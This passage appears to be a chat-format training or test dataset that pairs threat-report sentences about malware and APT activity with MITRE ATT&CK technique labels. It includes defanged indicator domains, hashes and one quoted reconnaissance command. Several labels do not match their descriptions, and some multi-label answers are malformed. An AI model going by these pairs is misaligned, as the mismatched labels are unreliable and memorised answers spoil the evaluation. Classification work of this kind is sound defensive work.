DDI Rule 15 : Many unsuccessful logon attempts (nbt_scan.exe) DDI Rule 38 : Multiple unsuccessful logon attempts (nbt_scan.exe) TippingPoint customers are protected from these threats via these ThreatDV filters: 27218: HTTP: TROJ_RATANKBA_A Checkin 28219: HTTP: TROJ_RATANKBA_A Checkin 02 27220: HTTPS: TROJ_RATANKBA_A Checkin 27221: HTTP: Sundown EK Flash Exploit (SWF_EXPLOYT.YYRQ) A list of related Indicators of Compromise (IoCs) can be found in this appendix" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT can download files to the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can identify system information, including battery status." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task" }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The kill_unwanted function gets a list of running processes, compares each process with a encrypted list of “unwanted” programs. With our aforementioned breakpoint on the ei_str function, we can dump the decrypted strings, to ascertain the value of the “unwanted” programs" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes has used a script that extracts the web session cookie and sends it to the C2 server." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pasam creates a backdoor through which remote attackers can retrieve lists of files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used RDP for lateral movement." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kinsing has created and run a Bitcoin cryptocurrency miner." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can list local and remote shared drives and folders over SMB." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowGoop can side-load `Goopdate.dll` into `GoogleUpdate.exe`." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591)" }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trickbot is the most common malware distributed by Emotet, but it is not the only one. Qakbot is another type of malware frequently dropped on Emotet-infected Windows hosts." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USBStealer exfiltrates collected files via removable media from air-gapped victims." }, { "role": "assistant", "content": "T1052.001 - Exfiltration over USB" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson contains a command to collect the victim PC name, disk drive information, and operating system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates run key Registry entries pointing to malicious DLLs dropped to disk." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has downloaded additional modules and malware to victim’s machines." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dok is packed with an UPX executable packer." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Generally, the malware uses AutoIt or VBS scripts added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Persistence was established via a crontab entry for a non-root user. With the binary named to masquerade as a legitimate file on the system and placed in a hidden directory, a crontab entry was created with a @reboot line so the GoldMax binary would execute again upon system reboot. Additionally, the threat actor used the nohup command to ignore any hangup signals, and the process will continue to run even if the terminal session was terminated" }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic can scan local network for open SMB." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable. As a result, there were additional stages and additional payloads that could inflict more damage to end systems" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon encrypts data using Base64 before being sent to the command and control server." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a scheduled task to establish by executing a malicious payload every subsequent minute." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload is a 32-bit executable file that is used to encrypt files on the victim’s system to extort a ransom" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has lured targets to click on malicious links to gain execution in the target environment." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has been distributed via spearphishing emails with malicious attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SynAck encrypts the victims machine followed by asking the victim to pay a ransom." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The folder C:\\Users\\Public\\Administrador\\logs\\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sample(s) f1b2bc0831445903c0d51b390b1987597009cc0fade009e07d792e8d455f6db0 5cc62ad6baf572dbae925f701526310778f032bb4a54b205bada78b1eb8c479c DNS tbs1/tbs2.microsoftonline.services Domains 0ffice365[.]agency 0ffice365[.]life 0ffice365[.]services 0nedrive[.]agency corewindows[.]agency microsoftonline[.]agency onedrive[.]agency sharepoint[.]agency skydrive[.]agency skydrive[.]services Sample eb33a96726a34dd60b053d3d1048137dffb1bba68a1ad6f56d33f5d6efb12b97 DNS tvs1/tvs2.trafficmanager.live Domains akamaiedge[.]live   akamaized[.]live   akdns[.]live   edgekey[.]live Table 7: Sample and Domain Associations The third cluster of domains had six different nameservers associated with them, but unlike the other two clusters, were all directly tied to each other" }, { "role": "assistant", "content": "T1007 - System Service Discovery', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT/Linux security battleground" }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper can create system services to aid in executing the payload." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to list local groups: \"net localgroup administrator >> %temp%\\download\"" }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stage 1: A Master Boot Record (MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later." }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For example, here is a folder and a list of files created by picking the C:\\Windows\\system32\\TCPSVCS.exe executable as a source of data" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can delete old binaries on a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The modules are signed by an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited” with serial numbers, copied from real Tencent certificates" }, { "role": "assistant", "content": "T1036.001 - Invalid Code Signature" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuditCred uses XOR and RC4 to perform decryption on the code functions." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShower has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use `rundll32.exe` to load DLL from the command line." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used Trojans from underground hacker websites." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This most likely means there is some type of DLL hijacking going on by distributing a legitimate McAfee binary with MirageFox to load up the DLL properly into a legitimate looking process" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWizard can copy files to other machines on a compromised network." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can identify installed security tools based on process names." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 dropped and executed tools used for password cracking, including Hydra and CrackMapExec." }, { "role": "assistant", "content": "T1110.002 - Brute Force: Password Cracking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use port 995 for C2." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Linux uses crontab for persistence if it does not have root privileges." }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It iterates over all possible Office <version> values for both Word and Excel <product> values. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The malware moves each located document into the AppData folder, inserts malicious Word or Excel macros into it using a Microsoft.Office.Interop object, and then moves the document back into its original folder. In the samples we analyzed, the injected macros were simple downloaders" }, { "role": "assistant", "content": "T1080 - Taint Shared Content" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker can modify registry values within the \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\" registry key." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has targeted specific individuals within an organization with tailored job vacancy announcements." }, { "role": "assistant", "content": "T1591.004 - Identify Roles" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are" }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE has been obfuscated with hex-encoded strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MailSniper can be used to obtain account names from Exchange and Office 365 using the \"Get-GlobalAddressList\" cmdlet." }, { "role": "assistant", "content": "T1087.003 - Email Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is worth noting at this point that the C2 IP address associated with the cosecman[]com domain appeared to selectively block one of our exit IPs during our research" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain information about process integrity levels." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT has been distributed as HTA files with VBScript." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user: C:\\Documents and Settings\\\\Start Menu\\Programs\\Startup\\viso.exe This step establishes the persistence of the malware across reboots on the endpoint Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint The malware might perform this activity for a couple of reasons: Establish persistence for itself on the endpoint Establish persistence of another component of the malware on the endpoint Update itself on endpoint after a separate updater component downloads the update from the control server The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PUNCHBUGGY can gather domain and workgroup information." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 6: Difference between a stock UPX packed file and the modified one A patch for UPX is available on ESET’s malware-research Github repository that allows unpacking Keydnap’s backdoor with the usual upx -d" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CallMe has the capability to download a file to the victim from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMail can identify the current username on the victim system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS uses PowerShell for obfuscation and execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FruitFly saves itself with a leading \".\" to make it a hidden file." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Russia-linked Shuckworm group (aka Gamaredon, Armageddon) is continuing to conduct cyber-espionage attacks against targets in Ukraine. Over the course of recent months, Symantec’s Threat Hunter Team, a part of Broadcom Software, has found evidence of attempted attacks against a number of organizations in the country" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtains Windows logon password details." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KeyBoy exploits the vulnerability CVE-2012-0158 for execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT can communicate with the C2 via subdomains that utilize base64 with character substitutions." }, { "role": "assistant", "content": "T1132.002 - Non-Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider has used PowerShell Empire for execution of malware." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used backdoors that can delete files used in an attack from an infected system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has conducted targeted surveillance against activists and bloggers." }, { "role": "assistant", "content": "T1589 - Gather Victim Identity Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can exfiltrate locally stored data via its C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ftp may 